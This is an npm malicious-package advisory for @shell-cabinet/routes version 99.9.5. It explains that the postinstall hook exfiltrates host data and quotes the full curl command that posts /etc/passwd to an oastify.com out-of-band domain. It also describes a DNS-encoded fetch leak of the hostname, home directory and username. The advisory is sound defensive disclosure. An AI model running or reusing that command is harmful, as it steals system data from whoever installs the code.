npm · Malicious package advisory
Malware@shell-cabinet/routes
MAL-2026-5428
Malicious code in @shell-cabinet/routes (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad) On `npm install`, the package's postinstall hook runs `curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, posting the installer's /etc/passwd to a hostname-prefixed subdomain of oastify.com (a Burp Collaborator out-of-band channel). The same postinstall first executes `scripts/scream3gg.js`, which hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username` and issues plain-HTTP fetch() requests with the hex chunked into subdomains of `nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, leaking host identifiers over DNS-encoded HTTP. Both behaviors fire unconditionally at install time and have no relationship to any documented package functionality.
Compromised versions (1)
- 99.9.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.